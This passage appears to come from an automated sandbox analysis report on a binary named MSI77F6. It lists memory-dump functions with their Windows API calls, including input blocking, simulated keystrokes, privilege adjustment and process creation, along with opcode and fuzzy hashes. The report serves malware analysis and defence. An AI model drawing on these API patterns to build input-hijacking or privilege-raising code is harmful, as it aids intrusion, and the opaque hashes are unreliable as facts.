                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 9bcefc3f33faee5ce9dcbf38137837979b558faea2f7ca888e1f178afe720d21
                                        • Instruction ID: 005036ffec152af2f92cd85dba5fd04a392b5b1d7baae2385871050b46dd27a4
                                        • Opcode Fuzzy Hash: 9bcefc3f33faee5ce9dcbf38137837979b558faea2f7ca888e1f178afe720d21
                                        • Instruction Fuzzy Hash: AA113C71A00228BFEB109B94DC45BEEBBBDEB45B10F108152F910E6290D6B45E018BA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b068672869928ccb0bf61783a8d8a05f7ad496d4499b5efe7f47364810774244
                                        • Instruction ID: b37fd6708633f62678b23e1bcade1647e0c0c3d998992d96e63696744a38e1f5
                                        • Opcode Fuzzy Hash: b068672869928ccb0bf61783a8d8a05f7ad496d4499b5efe7f47364810774244
                                        • Instruction Fuzzy Hash: F6A25875E00219CFCF28CF58C8806ADBBB1BF48354F2581AAD959AB395D7389D81DF90
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • GetParent.USER32(?), ref: 007EF4B5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0078ADDD,?,?,?,00000006,?), ref: 007EF52F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        • API String ID: 314495775-0
                                        • Opcode ID: a3eea217d9444d68df0662d2b24acf843d2d94fe0ff4f3b3d2a35e9642ac840b
                                        • Instruction ID: fe380aa5876eed4c17038a0c8686cba3478de78b464aa9a39af1eb97f1bba096
                                        • Opcode Fuzzy Hash: a3eea217d9444d68df0662d2b24acf843d2d94fe0ff4f3b3d2a35e9642ac840b
                                        • Instruction Fuzzy Hash: 8F219631641144AFDF35AF69CC4CAAA3BA2EF4A360F184264F6258B2E2D7389D11D750
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,007EF352,?,?,?), ref: 007DF115
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007DF0FB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID:
                                        • API String ID: 1273190321-0
                                        • Opcode ID: 6630903ff157bf7bf4af543d11a3ea7f392d5e09bc0998caebcb0080588cc705
                                        • Instruction ID: 1d886fd1764e2c1308868cd1b85c16b74f60dd310a064cc354cca2090643b3a7
                                        • Opcode Fuzzy Hash: 6630903ff157bf7bf4af543d11a3ea7f392d5e09bc0998caebcb0080588cc705
                                        • Instruction Fuzzy Hash: 5701B131200608EBDB21AF14DC89F6A7BB6FBC5764F144525F9165B3E1C736AC12DB60
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 007DF47D
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,007EF42E,?,?,?,?,?), ref: 007DF4A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        • API String ID: 3420055661-0
                                        • Opcode ID: e0a3916c03a32a8482ed13d1a3383c265e71f9be134e2f62214e25f1af5133cb
                                        • Instruction ID: 5119268fcab212c91ce4a2aec9976a7d1b8486357ec72b26f02111f13514eeac
                                        • Opcode Fuzzy Hash: e0a3916c03a32a8482ed13d1a3383c265e71f9be134e2f62214e25f1af5133cb
                                        • Instruction Fuzzy Hash: 9CF01772400118FFEF049F95DC099BEBBB9FF44351F10802AF902A2160D7B9AE51EB64
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007CC2E2,?,?,00000000,?), ref: 007BD73F
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007CC2E2,?,?,00000000,?), ref: 007BD751
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: ea78f416b928c7ed6c344f58f7dc472c0a2d7b9d0553974c09f3f2a65e6fbaf0
                                        • Instruction ID: 13006279f44ff5c50324529493578368ce9656ebe1b0d6bfc7bb5abed8c86905
                                        • Opcode Fuzzy Hash: ea78f416b928c7ed6c344f58f7dc472c0a2d7b9d0553974c09f3f2a65e6fbaf0
                                        • Instruction Fuzzy Hash: 4EF08C3510032DEBDB21AFA4CC4DFEA776DBF493A1F008155B909D6181E6389E40CBA4
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007B4B89
                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 007B4B9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: bb7886872b24de5a1a1a5033bca70130ba9ba61c92001be34d40016e0cb3112f
                                        • Instruction ID: 921ebbbbb03563ed505a1f414ca319efdb1102b1f7db37018b7b2de983593de9
                                        • Opcode Fuzzy Hash: bb7886872b24de5a1a1a5033bca70130ba9ba61c92001be34d40016e0cb3112f
                                        • Instruction Fuzzy Hash: DCF06D7080424DAFDB058FA0C805BBE7BB4AF00305F00C409F961A6192D779CA15DFA4
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007AB9EC), ref: 007AB8C5
                                        • CloseHandle.KERNEL32(?,?,007AB9EC), ref: 007AB8D7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 08a8679201abb65b48382868c4276e5a5e2e635ce53224aa08db9090773b7c92
                                        • Instruction ID: 0ba75e80f8bf160826fcc5bd51aac0613c86a33b2151b69c8832b96e91b8d220
                                        • Opcode Fuzzy Hash: 08a8679201abb65b48382868c4276e5a5e2e635ce53224aa08db9090773b7c92
                                        • Instruction Fuzzy Hash: E8E0B672014611EEEB262B64FC09DBA7BEAEF04311B11C929F59681470DB6AAC90EB50
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007DF59C
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007EF3AD,?,?,?,?), ref: 007DF5C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 6ef4dda3fcf20135aad99985f617f25ff6cc3c9cdc4ff4d2bf9e73e024c7003a
                                        • Instruction ID: 5b93a6bdc620ad20cf21515c767e37fb5ae1acb4f6dd699c3cbfb381db5dbad4
                                        • Opcode Fuzzy Hash: 6ef4dda3fcf20135aad99985f617f25ff6cc3c9cdc4ff4d2bf9e73e024c7003a
                                        • Instruction Fuzzy Hash: E2E08C30104218BBEB240F09EC0AFB93B29EB00B90F108526F917C90E0D7B898B0E664
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0077125D,00797A43,00770F35,?,?,00000001), ref: 00798E41
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00798E4A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 73ce1a2a2cbde7a1fa0e3a18cba09e7660a381b54aca14e3a4dc170cdad23696
                                        • Instruction ID: 6287cc2a67df2e4c5a4c3e9feb32d5c4dbe3f98eb3cb547a40d077ee670ac38e
                                        • Opcode Fuzzy Hash: 73ce1a2a2cbde7a1fa0e3a18cba09e7660a381b54aca14e3a4dc170cdad23696
                                        • Instruction Fuzzy Hash: 62B09271058A08EBEB102BA1EC09BA83F6AEF0AA62F008010F71D440608B675850CA9A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a874b3df759633b79cc4b542c3e3b7957d91158d9f2a140e4559e9266551a966
                                        • Instruction ID: e0b4c917b7ababeb0f37fbfcc8d1079bf414794e0ae577f0b8bfe92ebaafcb1d
                                        • Opcode Fuzzy Hash: a874b3df759633b79cc4b542c3e3b7957d91158d9f2a140e4559e9266551a966
                                        • Instruction Fuzzy Hash: 63B1EF20E2AF404DD6639639883533BB65CBFBB2C5F91D71BFC2A74D62EB2185834580
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 007E0352
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: ea66fd958cbaff0f2bbdf71abe716f79e1409ad0d594e6c8126574b754c0ed74
                                        • Instruction ID: f6685e938a08ea62ff947ea98cd899d5a9ad9a027ee5e978b714701877660d63
                                        • Opcode Fuzzy Hash: ea66fd958cbaff0f2bbdf71abe716f79e1409ad0d594e6c8126574b754c0ed74
                                        • Instruction Fuzzy Hash: DC113D31205295FFFB241B2DCC49F793714E749720F244329F9215A5E2CAEC8D40D2E9
                                        APIs
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 007DE7AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$CallLongProc
                                        • String ID:
                                        • API String ID: 4084987330-0
                                        • Opcode ID: 4f250085a2989b4656420c399d4fa841e8cd87bf337dd2201233b3774ca7d75a
                                        • Instruction ID: c26c0334449a7812217a65d14be42917d0e394edfc7d0134e0df13ed6c662144
                                        • Opcode Fuzzy Hash: 4f250085a2989b4656420c399d4fa841e8cd87bf337dd2201233b3774ca7d75a
                                        • Instruction Fuzzy Hash: 4CF0FF3510010CEFCF56AF94DC44DB93BB6FB44360B048525F9558B6A1C7369D70EB94
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,007EF417,?,?,?,?,?,00000001,?), ref: 007DEA9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        • Opcode ID: b512aff3022b6070f28b5b42e599cdd8e3a2f8c843039d78cc80b8a2784e8d2a
                                        • Instruction ID: e6bfe08534705978b38a84948912e88a59b728ba0f527d01809e04017f46a2c3
                                        • Opcode Fuzzy Hash: b512aff3022b6070f28b5b42e599cdd8e3a2f8c843039d78cc80b8a2784e8d2a
                                        • Instruction Fuzzy Hash: 39F08231100219EBDF157F15CC09ABA3B61FB40750F404016F9061A191D77A9865DBD5
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0078AF40,?,?,?,?,?), ref: 0078B83B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: b724c92ffca261cb09a955f270ef1ad53cf015b5d8ccc8a7d3bbb6a909e3843f
                                        • Instruction ID: e7d82e30bd82c21588c1ea8ffffa9317659e26d30f2e1dc14197a9755012659b
                                        • Opcode Fuzzy Hash: b724c92ffca261cb09a955f270ef1ad53cf015b5d8ccc8a7d3bbb6a909e3843f
                                        • Instruction Fuzzy Hash: E3F08234600209DFDF18EF15D8989353BA6FB85760F108A39F9524B2A0D775DC60DB94
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 007C7057
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: a8deaf0320f8b4eb832ca649782f400aa564638ebf27166ff5959dcd9cfb040a
                                        • Instruction ID: 77fa858e7d1034e05a05b06341c3fe3b1f1c5aba5dc4e3cb166be31a9363c8e3
                                        • Opcode Fuzzy Hash: a8deaf0320f8b4eb832ca649782f400aa564638ebf27166ff5959dcd9cfb040a
                                        • Instruction Fuzzy Hash: 8DE012352442049FC710EFA9D408E96B7DD9F58751F00C42EA945D7251DAB4E8408B90
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007DF41A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 5a904755d2e1623c0278a1078d8e78747163e08bacd5524eff4ef161853807c8
                                        • Instruction ID: a48d1b99a780da0d4ce6f1b04e1d847968dfa8df98da483f677606899208a7fe
                                        • Opcode Fuzzy Hash: 5a904755d2e1623c0278a1078d8e78747163e08bacd5524eff4ef161853807c8
                                        • Instruction Fuzzy Hash: 9BF06D31200289EFDF21EF58DC09FD67BA5FB05760F048469FA15672E1CB74A820D7A8
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0078ACC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 47f19659b575ab27b155178a92ad87e5705e4a07dd394df56ec500b6a2d7b083
                                        • Instruction ID: 94154650616978c701fca296978f57a0d92e46f38bb053467959487a49695461
                                        • Opcode Fuzzy Hash: 47f19659b575ab27b155178a92ad87e5705e4a07dd394df56ec500b6a2d7b083
                                        • Instruction Fuzzy Hash: 62E01235140208FBDF15BF90DC59E643B26FB89754F108429F6054B6A1CB37E922EB55
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,007EF3D4,?,?,?,?,?,?), ref: 007DF450
                                          • Part of subcall function 007DE13E: _memset.LIBCMT ref: 007DE14D
                                          • Part of subcall function 007DE13E: _memset.LIBCMT ref: 007DE15C
                                          • Part of subcall function 007DE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00833EE0,00833F24), ref: 007DE18B
                                          • Part of subcall function 007DE13E: CloseHandle.KERNEL32 ref: 007DE19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        • Opcode ID: b3552c59289debea0170bb50ae46f3baa806a45bc7abb245012c185b272479db
                                        • Instruction ID: d812640cb92d00fad477762675435a817bc1487add4f1737f17f15d962a36350
                                        • Opcode Fuzzy Hash: b3552c59289debea0170bb50ae46f3baa806a45bc7abb245012c185b272479db
                                        • Instruction Fuzzy Hash: 2BE09231210249DFCB11AF58DC49E9A37B6FB08750F018066FA055B2B1C775A961EF55
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 007DF3A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 3645c948912b53f2843f29f49171c18663351b4f8f76b4b42e7824a66fc54498
